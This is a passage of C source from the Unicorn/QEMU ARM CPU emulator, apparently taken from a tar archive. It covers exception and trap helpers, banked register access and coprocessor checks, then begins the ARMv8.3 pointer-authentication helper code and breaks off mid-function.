<< 16; return res; } void HELPER(setend)(CPUARMState *env) { env->uncached_cpsr ^= CPSR_E; arm_rebuild_hflags(env); } /* Function checks whether WFx (WFI/WFE) instructions are set up to be trapped. * The function returns the target EL (1-3) if the instruction is to be trapped; * otherwise it returns 0 indicating it is not trapped. */ static inline int check_wfx_trap(CPUARMState *env, bool is_wfe) { int cur_el = arm_current_el(env); uint64_t mask; if (arm_feature(env, ARM_FEATURE_M)) { /* M profile cores can never trap WFI/WFE. */ return 0; } /* If we are currently in EL0 then we need to check if SCTLR is set up for * WFx instructions being trapped to EL1. These trap bits don't exist in v7. */ if (cur_el < 1 && arm_feature(env, ARM_FEATURE_V8)) { int target_el; mask = is_wfe ? SCTLR_nTWE : SCTLR_nTWI; if (arm_is_secure_below_el3(env) && !arm_el_is_aa64(env, 3)) { /* Secure EL0 and Secure PL1 is at EL3 */ target_el = 3; } else { target_el = 1; } if (!(env->cp15.sctlr_el[target_el] & mask)) { return target_el; } } /* We are not trapping to EL1; trap to EL2 if HCR_EL2 requires it * No need for ARM_FEATURE check as if HCR_EL2 doesn't exist the * bits will be zero indicating no trap. */ if (cur_el < 2) { mask = is_wfe ? HCR_TWE : HCR_TWI; if (arm_hcr_el2_eff(env) & mask) { return 2; } } /* We are not trapping to EL1 or EL2; trap to EL3 if SCR_EL3 requires it */ if (cur_el < 3) { mask = (is_wfe) ? SCR_TWE : SCR_TWI; if (env->cp15.scr_el3 & mask) { return 3; } } return 0; } void HELPER(wfi)(CPUARMState *env, uint32_t insn_len) { CPUState *cs = env_cpu(env); int target_el = check_wfx_trap(env, false); if (cpu_has_work(cs)) { /* Don't bother to go into our "low power state" if * we would just wake up immediately. */ return; } if (target_el) { if (env->aarch64) { env->pc -= insn_len; } else { env->regs[15] -= insn_len; } raise_exception(env, EXCP_UDEF, syn_wfx(1, 0xe, 0, insn_len == 2), target_el); } cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); } void HELPER(wfe)(CPUARMState *env) { /* This is a hint instruction that is semantically different * from YIELD even though we currently implement it identically. * Don't actually halt the CPU, just yield back to top * level loop. This is not going into a "low power state" * (ie halting until some event occurs), so we never take * a configurable trap to a different exception level. */ HELPER(yield)(env); } void HELPER(yield)(CPUARMState *env) { CPUState *cs = env_cpu(env); /* This is a non-trappable hint instruction that generally indicates * that the guest is currently busy-looping. Yield control back to the * top level loop so that a more deserving VCPU has a chance to run. */ cs->exception_index = EXCP_YIELD; cpu_loop_exit(cs); } /* Raise an internal-to-QEMU exception. This is limited to only * those EXCP values which are special cases for QEMU to interrupt * execution and not to be used for exceptions which are passed to * the guest (those must all have syndrome information and thus should * use exception_with_syndrome). */ void HELPER(exception_internal)(CPUARMState *env, uint32_t excp) { CPUState *cs = env_cpu(env); assert(excp_is_internal(excp)); cs->exception_index = excp; cpu_loop_exit(cs); } /* Raise an exception with the specified syndrome register value */ void HELPER(exception_with_syndrome)(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el) { raise_exception(env, excp, syndrome, target_el); } /* Raise an EXCP_BKPT with the specified syndrome register value, * targeting the correct exception level for debug exceptions. */ void HELPER(exception_bkpt_insn)(CPUARMState *env, uint32_t syndrome) { int debug_el = arm_debug_target_el(env); int cur_el = arm_current_el(env); /* FSR will only be used if the debug target EL is AArch32. */ env->exception.fsr = arm_debug_exception_fsr(env); /* FAR is UNKNOWN: clear vaddress to avoid potentially exposing * values to the guest that it shouldn't be able to see at its * exception/security level. */ env->exception.vaddress = 0; /* * Other kinds of architectural debug exception are ignored if * they target an exception level below the current one (in QEMU * this is checked by arm_generate_debug_exceptions()). Breakpoint * instructions are special because they always generate an exception * to somewhere: if they can't go to the configured debug exception * level they are taken to the current exception level. */ if (debug_el < cur_el) { debug_el = cur_el; } raise_exception(env, EXCP_BKPT, syndrome, debug_el); } uint32_t HELPER(cpsr_read)(CPUARMState *env) { /* * We store the ARMv8 PSTATE.SS bit in env->uncached_cpsr. * This is convenient for populating SPSR_ELx, but must be * hidden from aarch32 mode, where it is not visible. * * TODO: ARMv8.4-DIT -- need to move SS somewhere else. */ return cpsr_read(env) & ~(CPSR_EXEC | PSTATE_SS); } void HELPER(cpsr_write)(CPUARMState *env, uint32_t val, uint32_t mask) { cpsr_write(env, val, mask, CPSRWriteByInstr); /* TODO: Not all cpsr bits are relevant to hflags. */ arm_rebuild_hflags(env); } /* Write the CPSR for a 32-bit exception return */ void HELPER(cpsr_write_eret)(CPUARMState *env, uint32_t val) { uint32_t mask; arm_call_pre_el_change_hook(env_archcpu(env)); mask = aarch32_cpsr_valid_mask(env->features, &env_archcpu(env)->isar); cpsr_write(env, val, mask, CPSRWriteExceptionReturn); /* Generated code has already stored the new PC value, but * without masking out its low bits, because which bits need * masking depends on whether we're returning to Thumb or ARM * state. Do the masking now. */ env->regs[15] &= (env->thumb ? ~1 : ~3); arm_rebuild_hflags(env); arm_call_el_change_hook(env_archcpu(env)); } /* Access to user mode registers from privileged modes. */ uint32_t HELPER(get_user_reg)(CPUARMState *env, uint32_t regno) { uint32_t val; if (regno == 13) { val = env->banked_r13[BANK_USRSYS]; } else if (regno == 14) { val = env->banked_r14[BANK_USRSYS]; } else if (regno >= 8 && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { val = env->usr_regs[regno - 8]; } else { val = env->regs[regno]; } return val; } void HELPER(set_user_reg)(CPUARMState *env, uint32_t regno, uint32_t val) { if (regno == 13) { env->banked_r13[BANK_USRSYS] = val; } else if (regno == 14) { env->banked_r14[BANK_USRSYS] = val; } else if (regno >= 8 && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { env->usr_regs[regno - 8] = val; } else { env->regs[regno] = val; } } void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val) { if ((env->uncached_cpsr & CPSR_M) == mode) { env->regs[13] = val; } else { env->banked_r13[bank_number(mode)] = val; } } uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode) { if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_SYS) { /* SRS instruction is UNPREDICTABLE from System mode; we UNDEF. * Other UNPREDICTABLE and UNDEF cases were caught at translate time. */ raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } if ((env->uncached_cpsr & CPSR_M) == mode) { return env->regs[13]; } else { return env->banked_r13[bank_number(mode)]; } } static void msr_mrs_banked_exc_checks(CPUARMState *env, uint32_t tgtmode, uint32_t regno) { /* Raise an exception if the requested access is one of the UNPREDICTABLE * cases; otherwise return. This broadly corresponds to the pseudocode * BankedRegisterAccessValid() and SPSRAccessValid(), * except that we have already handled some cases at translate time. */ int curmode = env->uncached_cpsr & CPSR_M; if (regno == 17) { /* ELR_Hyp: a special case because access from tgtmode is OK */ if (curmode != ARM_CPU_MODE_HYP && curmode != ARM_CPU_MODE_MON) { goto undef; } return; } if (curmode == tgtmode) { goto undef; } if (tgtmode == ARM_CPU_MODE_USR) { if (regno >= 8 && regno <= 12) { if (curmode != ARM_CPU_MODE_FIQ) { goto undef; } } else { switch (regno) { case 13: if (curmode == ARM_CPU_MODE_SYS) { goto undef; } break; case 14: if (curmode == ARM_CPU_MODE_HYP || curmode == ARM_CPU_MODE_SYS) { goto undef; } break; default: break; } } } if (tgtmode == ARM_CPU_MODE_HYP) { /* SPSR_Hyp, r13_hyp: accessible from Monitor mode only */ if (curmode != ARM_CPU_MODE_MON) { goto undef; } } return; undef: raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } void HELPER(msr_banked)(CPUARMState *env, uint32_t value, uint32_t tgtmode, uint32_t regno) { msr_mrs_banked_exc_checks(env, tgtmode, regno); if (regno >= 8 && regno <= 12) { switch (tgtmode) { case ARM_CPU_MODE_USR: env->usr_regs[regno - 8] = value; break; case ARM_CPU_MODE_FIQ: env->fiq_regs[regno - 8] = value; break; default: // g_assert_not_reached(); break; } } else { switch (regno) { case 16: /* SPSRs */ env->banked_spsr[bank_number(tgtmode)] = value; break; case 17: /* ELR_Hyp */ env->elr_el[2] = value; break; case 13: env->banked_r13[bank_number(tgtmode)] = value; break; case 14: env->banked_r14[r14_bank_number(tgtmode)] = value; break; default: g_assert_not_reached(); } } } uint32_t HELPER(mrs_banked)(CPUARMState *env, uint32_t tgtmode, uint32_t regno) { msr_mrs_banked_exc_checks(env, tgtmode, regno); if (regno >= 8 && regno <= 12) { switch (tgtmode) { case ARM_CPU_MODE_USR: return env->usr_regs[regno - 8]; case ARM_CPU_MODE_FIQ: return env->fiq_regs[regno - 8]; default: g_assert_not_reached(); // never reach here return 0; } } else { switch (regno) { case 16: /* SPSRs */ return env->banked_spsr[bank_number(tgtmode)]; case 17: /* ELR_Hyp */ return env->elr_el[2]; case 13: return env->banked_r13[bank_number(tgtmode)]; case 14: return env->banked_r14[r14_bank_number(tgtmode)]; default: g_assert_not_reached(); // never reach here return 0; } } } void HELPER(access_check_cp_reg)(CPUARMState *env, void *rip, uint32_t syndrome, uint32_t isread) { const ARMCPRegInfo *ri = rip; int target_el = 0; if (arm_feature(env, ARM_FEATURE_XSCALE) && ri->cp < 14 && extract32(env->cp15.c15_cpar, ri->cp, 1) == 0) { raise_exception(env, EXCP_UDEF, syndrome, exception_target_el(env)); } /* * Check for an EL2 trap due to HSTR_EL2. We expect EL0 accesses * to sysregs non accessible at EL0 to have UNDEF-ed already. */ if (!is_a64(env) && arm_current_el(env) < 2 && ri->cp == 15 && (arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { uint32_t mask = 1 << ri->crn; if (ri->type & ARM_CP_64BIT) { mask = 1 << ri->crm; } /* T4 and T14 are RES0 */ mask &= ~((1 << 4) | (1 << 14)); if (env->cp15.hstr_el2 & mask) { target_el = 2; goto exept; } } if (!ri->accessfn) { return; } switch (ri->accessfn(env, ri, isread)) { case CP_ACCESS_OK: return; case CP_ACCESS_TRAP: target_el = exception_target_el(env); break; case CP_ACCESS_TRAP_EL2: /* Requesting a trap to EL2 when we're in EL3 or S-EL0/1 is * a bug in the access function. */ assert(!arm_is_secure(env) && arm_current_el(env) != 3); target_el = 2; break; case CP_ACCESS_TRAP_EL3: target_el = 3; break; case CP_ACCESS_TRAP_UNCATEGORIZED: target_el = exception_target_el(env); syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_UNCATEGORIZED_EL2: target_el = 2; syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_UNCATEGORIZED_EL3: target_el = 3; syndrome = syn_uncategorized(); break; case CP_ACCESS_TRAP_FP_EL2: target_el = 2; /* Since we are an implementation that takes exceptions on a trapped * conditional insn only if the insn has passed its condition code * check, we take the IMPDEF choice to always report CV=1 COND=0xe * (which is also the required value for AArch64 traps). */ syndrome = syn_fp_access_trap(1, 0xe, false); break; case CP_ACCESS_TRAP_FP_EL3: target_el = 3; syndrome = syn_fp_access_trap(1, 0xe, false); break; default: g_assert_not_reached(); break; } exept: raise_exception(env, EXCP_UDEF, syndrome, target_el); } void HELPER(set_cp_reg)(CPUARMState *env, void *rip, uint32_t value) { const ARMCPRegInfo *ri = rip; if (ri->type & ARM_CP_IO) { ri->writefn(env, ri, value); } else { ri->writefn(env, ri, value); } } uint32_t HELPER(get_cp_reg)(CPUARMState *env, void *rip) { const ARMCPRegInfo *ri = rip; uint32_t res; if (ri->type & ARM_CP_IO) { res = ri->readfn(env, ri); } else { res = ri->readfn(env, ri); } return res; } void HELPER(set_cp_reg64)(CPUARMState *env, void *rip, uint64_t value) { const ARMCPRegInfo *ri = rip; if (ri->type & ARM_CP_IO) { ri->writefn(env, ri, value); } else { ri->writefn(env, ri, value); } } uint64_t HELPER(get_cp_reg64)(CPUARMState *env, void *rip) { const ARMCPRegInfo *ri = rip; uint64_t res; if (ri->type & ARM_CP_IO) { res = ri->readfn(env, ri); } else { res = ri->readfn(env, ri); } return res; } void HELPER(pre_hvc)(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); int cur_el = arm_current_el(env); /* FIXME: Use actual secure state. */ bool secure = false; bool undef; if (arm_is_psci_call(cpu, EXCP_HVC)) { /* If PSCI is enabled and this looks like a valid PSCI call then * that overrides the architecturally mandated HVC behaviour. */ return; } if (!arm_feature(env, ARM_FEATURE_EL2)) { /* If EL2 doesn't exist, HVC always UNDEFs */ undef = true; } else if (arm_feature(env, ARM_FEATURE_EL3)) { /* EL3.HCE has priority over EL2.HCD. */ undef = !(env->cp15.scr_el3 & SCR_HCE); } else { undef = env->cp15.hcr_el2 & HCR_HCD; } /* In ARMv7 and ARMv8/AArch32, HVC is undef in secure state. * For ARMv8/AArch64, HVC is allowed in EL3. * Note that we've already trapped HVC from EL0 at translation * time. */ if (secure && (!is_a64(env) || cur_el == 1)) { undef = true; } if (undef) { raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } } void HELPER(pre_smc)(CPUARMState *env, uint32_t syndrome) { ARMCPU *cpu = env_archcpu(env); int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); bool smd_flag = env->cp15.scr_el3 & SCR_SMD; /* * SMC behaviour is summarized in the following table. * This helper handles the "Trap to EL2" and "Undef insn" cases. * The "Trap to EL3" and "PSCI call" cases are handled in the exception * helper. * * -> ARM_FEATURE_EL3 and !SMD * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Trap to EL3 * Conduit not SMC Trap to EL2 Trap to EL3 * * * -> ARM_FEATURE_EL3 and SMD * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Undef insn * Conduit not SMC Trap to EL2 Undef insn * * * -> !ARM_FEATURE_EL3 * HCR_TSC && NS EL1 !HCR_TSC || !NS EL1 * * Conduit SMC, valid call Trap to EL2 PSCI Call * Conduit SMC, inval call Trap to EL2 Undef insn * Conduit not SMC Undef insn Undef insn */ /* On ARMv8 with EL3 AArch64, SMD applies to both S and NS state. * On ARMv8 with EL3 AArch32, or ARMv7 with the Virtualization * extensions, SMD only applies to NS state. * On ARMv7 without the Virtualization extensions, the SMD bit * doesn't exist, but we forbid the guest to set it to 1 in scr_write(), * so we need not special case this here. */ bool smd = arm_feature(env, ARM_FEATURE_AARCH64) ? smd_flag : smd_flag && !secure; if (!arm_feature(env, ARM_FEATURE_EL3) && cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { /* If we have no EL3 then SMC always UNDEFs and can't be * trapped to EL2. PSCI-via-SMC is a sort of ersatz EL3 * firmware within QEMU, and we want an EL2 guest to be able * to forbid its EL1 from making PSCI calls into QEMU's * "firmware" via HCR.TSC, so for these purposes treat * PSCI-via-SMC as implying an EL3. * This handles the very last line of the previous table. */ raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } if (cur_el == 1 && (arm_hcr_el2_eff(env) & HCR_TSC)) { /* In NS EL1, HCR controlled routing to EL2 has priority over SMD. * We also want an EL2 guest to be able to forbid its EL1 from * making PSCI calls into QEMU's "firmware" via HCR.TSC. * This handles all the "Trap to EL2" cases of the previous table. */ raise_exception(env, EXCP_HYP_TRAP, syndrome, 2); } /* Catch the two remaining "Undef insn" cases of the previous table: * - PSCI conduit is SMC but we don't have a valid PCSI call, * - We don't have EL3 or SMD is set. */ if (!arm_is_psci_call(cpu, EXCP_SMC) && (smd || !arm_feature(env, ARM_FEATURE_EL3))) { raise_exception(env, EXCP_UDEF, syn_uncategorized(), exception_target_el(env)); } } /* ??? Flag setting arithmetic is awkward because we need to do comparisons. The only way to do that in TCG is a conditional branch, which clobbers all our temporaries. For now implement these as helper functions. */ /* Similarly for variable shift instructions. */ uint32_t HELPER(shl_cc)(CPUARMState *env, uint32_t x, uint32_t i) { int shift = i & 0xff; if (shift >= 32) { if (shift == 32) env->CF = x & 1; else env->CF = 0; return 0; } else if (shift != 0) { env->CF = (x >> (32 - shift)) & 1; return x << shift; } return x; } uint32_t HELPER(shr_cc)(CPUARMState *env, uint32_t x, uint32_t i) { int shift = i & 0xff; if (shift >= 32) { if (shift == 32) env->CF = (x >> 31) & 1; else env->CF = 0; return 0; } else if (shift != 0) { env->CF = (x >> (shift - 1)) & 1; return x >> shift; } return x; } uint32_t HELPER(sar_cc)(CPUARMState *env, uint32_t x, uint32_t i) { int shift = i & 0xff; if (shift >= 32) { env->CF = (x >> 31) & 1; return (int32_t)x >> 31; } else if (shift != 0) { env->CF = (x >> (shift - 1)) & 1; return (int32_t)x >> shift; } return x; } uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, uint32_t i) { int shift1, shift; shift1 = i & 0xff; shift = shift1 & 0x1f; if (shift == 0) { if (shift1 != 0) env->CF = (x >> 31) & 1; return x; } else { env->CF = (x >> (shift - 1)) & 1; return ((uint32_t)x >> shift) | (x << (32 - shift)); } } uint32_t HELPER(uc_hooksys64)(CPUARMState *env, uint32_t insn, void *hk) { uc_arm64_reg uc_rt; struct hook *hook = (struct hook*)hk; uc_arm64_cp_reg cp_reg; uint32_t rt; uc_engine *uc = env->uc; if (hook->to_delete) { return 0; } rt = extract32(insn, 0, 5); cp_reg.op0 = extract32(insn, 19, 2); cp_reg.op1 = extract32(insn, 16, 3); cp_reg.crn = extract32(insn, 12, 4); cp_reg.crm = extract32(insn, 8, 4); cp_reg.op2 = extract32(insn, 5, 3); if (rt <= 28 && rt >= 0) { uc_rt = UC_ARM64_REG_X0 + rt; cp_reg.val = env->xregs[rt]; } else if (rt == 29 ) { uc_rt = UC_ARM64_REG_X29; cp_reg.val = env->xregs[29]; } else if (rt == 30) { uc_rt = UC_ARM64_REG_X30; cp_reg.val = env->xregs[30]; } else { uc_rt = UC_ARM64_REG_XZR; cp_reg.val = 0; } uint32_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_sys_t)(hook->callback))(uc, uc_rt, &cp_reg, hook->user_data)); return ret; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/pauth_helper.c��������������������������������������������������������0000664�0000000�0000000�00000033711�14675241067�0021051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM v8.3-PAuth Operations * * Copyright (c) 2019 Linaro, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static uint64_t pac_cell_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 52, 4); o |= extract64(i, 24, 4) << 4; o |= extract64(i, 44, 4) << 8; o |= extract64(i, 0, 4) << 12; o |= extract64(i, 28, 4) << 16; o |= extract64(i, 48, 4) << 20; o |= extract64(i, 4, 4) << 24; o |= extract64(i, 40, 4) << 28; o |= extract64(i, 32, 4) << 32; o |= extract64(i, 12, 4) << 36; o |= extract64(i, 56, 4) << 40; o |= extract64(i, 20, 4) << 44; o |= extract64(i, 8, 4) << 48; o |= extract64(i, 36, 4) << 52; o |= extract64(i, 16, 4) << 56; o |= extract64(i, 60, 4) << 60; return o; } static uint64_t pac_cell_inv_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 12, 4); o |= extract64(i, 24, 4) << 4; o |= extract64(i, 48, 4) << 8; o |= extract64(i, 36, 4) << 12; o |= extract64(i, 56, 4) << 16; o |= extract64(i, 44, 4) << 20; o |= extract64(i, 4, 4) << 24; o |= extract64(i, 16, 4) << 28; o |= i & MAKE_64BIT_MASK(32, 4); o |= extract64(i, 52, 4) << 36; o |= extract64(i, 28, 4) << 40; o |= extract64(i, 8, 4) << 44; o |= extract64(i, 20, 4) << 48; o |= extract64(i, 0, 4) << 52; o |= extract64(i, 40, 4) << 56; o |= i & MAKE_64BIT_MASK(60, 4); return o; } static uint64_t pac_sub(uint64_t i) { static const uint8_t sub[16] = { 0xb, 0x6, 0x8, 0xf, 0xc, 0x0, 0x9, 0xe, 0x3, 0x7, 0x4, 0x5, 0xd, 0x2, 0x1, 0xa, }; uint64_t o = 0; int b; for (b = 0; b < 64; b += 4) { o |= (uint64_t)sub[(i >> b) & 0xf] << b; } return o; } static uint64_t pac_inv_sub(uint64_t i) { static const uint8_t inv_sub[16] = { 0x5, 0xe, 0xd, 0x8, 0xa, 0xb, 0x1, 0x9, 0x2, 0x6, 0xf, 0x0, 0x4, 0xc, 0x7, 0x3, }; uint64_t o = 0; int b; for (b = 0; b < 64; b += 4) { o |= (uint64_t)inv_sub[(i >> b) & 0xf] << b; } return o; } static int rot_cell(int cell, int n) { /* 4-bit rotate left by n. */ cell |= cell << 4; return extract32(cell, 4 - n, 4); } static uint64_t pac_mult(uint64_t i) { uint64_t o = 0; int b; for (b = 0; b < 4 * 4; b += 4) { int i0, i4, i8, ic, t0, t1, t2, t3; i0 = extract64(i, b, 4); i4 = extract64(i, b + 4 * 4, 4); i8 = extract64(i, b + 8 * 4, 4); ic = extract64(i, b + 12 * 4, 4); t0 = rot_cell(i8, 1) ^ rot_cell(i4, 2) ^ rot_cell(i0, 1); t1 = rot_cell(ic, 1) ^ rot_cell(i4, 1) ^ rot_cell(i0, 2); t2 = rot_cell(ic, 2) ^ rot_cell(i8, 1) ^ rot_cell(i0, 1); t3 = rot_cell(ic, 1) ^ rot_cell(i8, 2) ^ rot_cell(i4, 1); o |= (uint64_t)t3 << b; o |= (uint64_t)t2 << (b + 4 * 4); o |= (uint64_t)t1 << (b + 8 * 4); o |= (uint64_t)t0 << (b + 12 * 4); } return o; } static uint64_t tweak_cell_rot(uint64_t cell) { return (cell >> 1) | (((cell ^ (cell >> 1)) & 1) << 3); } static uint64_t tweak_shuffle(uint64_t i) { uint64_t o = 0; o |= extract64(i, 16, 4) << 0; o |= extract64(i, 20, 4) << 4; o |= tweak_cell_rot(extract64(i, 24, 4)) << 8; o |= extract64(i, 28, 4) << 12; o |= tweak_cell_rot(extract64(i, 44, 4)) << 16; o |= extract64(i, 8, 4) << 20; o |= extract64(i, 12, 4) << 24; o |= tweak_cell_rot(extract64(i, 32, 4)) << 28; o |= extract64(i, 48, 4) << 32; o |= extract64(i, 52, 4) << 36; o |= extract64(i, 56, 4) << 40; o |= tweak_cell_rot(extract64(i, 60, 4)) << 44; o |= tweak_cell_rot(extract64(i, 0, 4)) << 48; o |= extract64(i, 4, 4) << 52; o |= tweak_cell_rot(extract64(i, 40, 4)) << 56; o |= tweak_cell_rot(extract64(i, 36, 4)) << 60; return o; } static uint64_t tweak_cell_inv_rot(uint64_t cell) { return ((cell << 1) & 0xf) | ((cell & 1) ^ (cell >> 3)); } static uint64_t tweak_inv_shuffle(uint64_t i) { uint64_t o = 0; o |= tweak_cell_inv_rot(extract64(i, 48, 4)); o |= extract64(i, 52, 4) << 4; o |= extract64(i, 20, 4) << 8; o |= extract64(i, 24, 4) << 12; o |= extract64(i, 0, 4) << 16; o |= extract64(i, 4, 4) << 20; o |= tweak_cell_inv_rot(extract64(i, 8, 4)) << 24; o |= extract64(i, 12, 4) << 28; o |= tweak_cell_inv_rot(extract64(i, 28, 4)) << 32; o |= tweak_cell_inv_rot(extract64(i, 60, 4)) << 36; o |= tweak_cell_inv_rot(extract64(i, 56, 4)) << 40; o |= tweak_cell_inv_rot(extract64(i, 16, 4)) << 44; o |= extract64(i, 32, 4) << 48; o |= extract64(i, 36, 4) << 52; o |= extract64(i, 40, 4) << 56; o |= tweak_cell_inv_rot(extract64(i, 44, 4)) << 60; return o; } static uint64_t pauth_computepac(uint64_t data, uint64_t modifier, ARMPACKey key) { static const uint64_t RC[5] = { 0x0000000000000000ull, 0x13198A2E03707344ull, 0xA4093822299F31D0ull, 0x082EFA98EC4E6C89ull, 0x452821E638D01377ull, }; const uint64_t alpha = 0xC0AC29B7C97C50DDull; /* * Note that in the ARM pseudocode, key0 contains bits <127:64> * and key1 contains bits <63:0> of the 128-bit key. */ uint64_t key0 = key.hi, key1 = key.lo; uint64_t workingval, runningmod, roundkey, modk0; int i; modk0 = (key0 << 63) | ((key0 >> 1) ^ (key0 >> 63)); runningmod = modifier; workingval = data ^ key0; for (i = 0; i <= 4; ++i) { roundkey = key1 ^ runningmod; workingval ^= roundkey; workingval ^= RC[i]; if (i > 0) { workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); } workingval = pac_sub(workingval); runningmod = tweak_shuffle(runningmod); } roundkey = modk0 ^ runningmod; workingval ^= roundkey; workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); workingval = pac_sub(workingval); workingval = pac_cell_shuffle(workingval); workingval = pac_mult(workingval); workingval ^= key1; workingval = pac_cell_inv_shuffle(workingval); workingval = pac_inv_sub(workingval); workingval = pac_mult(workingval); workingval = pac_cell_inv_shuffle(workingval); workingval ^= key0; workingval ^= runningmod; for (i = 0; i <= 4; ++i) { workingval = pac_inv_sub(workingval); if (i < 4) { workingval = pac_mult(workingval); workingval = pac_cell_inv_shuffle(workingval); } runningmod = tweak_inv_shuffle(runningmod); roundkey = key1 ^ runningmod; workingval ^= RC[4 - i]; workingval ^= roundkey; workingval ^= alpha; } workingval ^= modk0; return workingval; } static uint64_t pauth_addpac(CPUARMState *env, uint64_t ptr, uint64_t modifier, ARMPACKey *key, bool data) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); uint64_t pac, ext_ptr, ext, test; int bot_bit, top_bit; /* If tagged pointers are in use, use ptr<55>, otherwise ptr<63>. */ if (param.tbi) { ext = sextract64(ptr, 55, 1); } else { ext = sextract64(ptr, 63, 1); } /* Build a pointer with known good extension bits. */ top_bit = 64 - 8 * param.tbi; bot_bit = 64 - param.tsz; ext_ptr = deposit64(ptr, bot_bit, top_bit - bot_bit, ext); pac = pauth_computepac(ext_ptr, modifier, *key); /* * Check if the ptr has good extension bits and corrupt the * pointer authentication code if not. */ test = sextract64(ptr, bot_bit, top_bit - bot_bit); if (test != 0 && test != -1) { pac ^= MAKE_64BIT_MASK(top_bit - 1, 1); } /* * Preserve the determination between upper and lower at bit 55, * and insert pointer authentication code. */ if (param.tbi) { ptr &= ~MAKE_64BIT_MASK(bot_bit, 55 - bot_bit + 1); pac &= MAKE_64BIT_MASK(bot_bit, 54 - bot_bit + 1); } else { ptr &= MAKE_64BIT_MASK(0, bot_bit); pac &= ~(MAKE_64BIT_MASK(55, 1) | MAKE_64BIT_MASK(0, bot_bit)); } ext &= MAKE_64BIT_MASK(55, 1); return pac | ext | ptr; } static uint64_t pauth_original_ptr(uint64_t ptr, ARMVAParameters param) { /* Note that bit 55 is used whether or not the regime has 2 ranges. */ uint64_t extfield = sextract64(ptr, 55, 1); int bot_pac_bit = 64 - param.tsz; int top_pac_bit = 64 - 8 * param.tbi; return deposit64(ptr, bot_pac_bit, top_pac_bit - bot_pac_bit, extfield); } static uint64_t pauth_auth(CPUARMState *env, uint64_t ptr, uint64_t modifier, ARMPACKey *key, bool data, int keynumber) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); int bot_bit, top_bit; uint64_t pac, orig_ptr, test; orig_ptr = pauth_original_ptr(ptr, param); pac = pauth_computepac(orig_ptr, modifier, *key); bot_bit = 64 - param.tsz; top_bit = 64 - 8 * param.tbi; test = (pac ^ ptr) & ~MAKE_64BIT_MASK(55, 1); if (unlikely(extract64(test, bot_bit, top_bit - bot_bit))) { int error_code = (keynumber << 1) | (keynumber ^ 1); if (param.tbi) { return deposit64(orig_ptr, 53, 2, error_code); } else { return deposit64(orig_ptr, 61, 2, error_code); } } return orig_ptr; } static uint64_t pauth_strip(CPUARMState *env, uint64_t ptr, bool data) { ARMMMUIdx mmu_idx = arm_stage1_mmu_idx(env); ARMVAParameters param = aa64_va_parameters(env, ptr, mmu_idx, data); return pauth_original_ptr(ptr, param); } static void QEMU_NORETURN pauth_trap(CPUARMState *env, int target_el, uintptr_t ra) { raise_exception_ra(env, EXCP_UDEF, syn_pactrap(), target_el, ra); } static void pauth_check_trap(CPUARMState *env, int el, uintptr_t ra) { if (el < 2 && arm_feature(env, ARM_FEATURE_EL2)) { uint64_t hcr = arm_hcr_el2_eff(env); bool trap = !(hcr & HCR_API); if (el == 0) { /* Trap only applies to EL1&0 regime. */ trap &= (hcr & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE); } /* FIXME: ARMv8.3-NV: HCR_NV trap takes precedence for ERETA[AB]. */ if (trap) { pauth_trap(env, 2, ra); } } if (el < 3 && arm_feature(env, ARM_FEATURE_EL3)) { if (!(env->cp15.scr_el3 & SCR_API)) { pauth_trap(env, 3, ra); } } } static bool pauth_key_enabled(CPUARMState *env, int el, uint32_t bit) { return (arm_sctlr(env, el) & bit) != 0; } uint64_t HELPER(pacia)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, 